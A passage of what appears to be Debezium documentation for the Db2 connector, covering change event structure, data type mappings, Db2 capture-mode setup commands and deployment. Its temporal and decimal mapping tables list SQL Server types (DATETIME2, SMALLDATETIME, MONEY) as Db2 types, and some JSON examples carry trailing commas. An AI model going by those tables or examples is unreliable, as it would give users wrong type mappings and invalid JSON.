in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed.
+\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs="+attributes"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n 
\"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. 
When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. 
In this example, note that the `EMAIL` value is `john.doe@example.org`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.org`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contained the deleted row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n
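The following sketch illustrates the pair of records that a consumer of the topic for the `customers` table sees after the row with `ID` 1005 is deleted. The representation is schematic rather than actual connector output; the first record's value is the _delete_ event envelope shown earlier (elided here), and the second record is the tombstone:\n\n[source,json,indent=0]\n----\n[\n  { \"key\": { \"ID\": 1005 }, \"value\": { \"op\": \"d\", \"...\": \"...\" } },\n  { \"key\": { \"ID\": 1005 }, \"value\": null }\n]\n----\n\n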
\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. 
This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type \n|Literal type (schema type) \n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently, SQL Replication on Db2 does not support BOOLEAN, so {prodname} cannot perform CDC on those tables. Consider using a different type.\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value has been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. 
This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds since the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *result in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. 
Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME`, and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n
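To make the `Decimal` encoding concrete, the following sketch shows how a hypothetical `PRICE` column defined as `DECIMAL(10,2)` with the value `123.45` could appear in a change event when the JSON converter is used: the unscaled value `12345` is serialized as Base64-encoded big-endian bytes (`MDk=`), while the scale and precision travel in the schema parameters. This is an illustration under those assumptions, not captured connector output:\n\n[source,json,indent=0]\n----\n{\n  \"schema\": {\n    \"type\": \"bytes\",\n    \"optional\": false,\n    \"name\": \"org.apache.kafka.connect.data.Decimal\",\n    \"version\": 1,\n    \"parameters\": {\n      \"scale\": \"2\",\n      \"connect.decimal.precision\": \"10\"\n    },\n    \"field\": \"PRICE\"\n  },\n  \"payload\": \"MDk=\"\n}\n----\n\n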
\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2inst1` user, which is the default instance and user name when using the Db2 Docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `\/dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. Because you are logged in as the `db2inst1` user, the UDFs are installed under the `db2inst1` schema:\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture mode. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. 
Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} 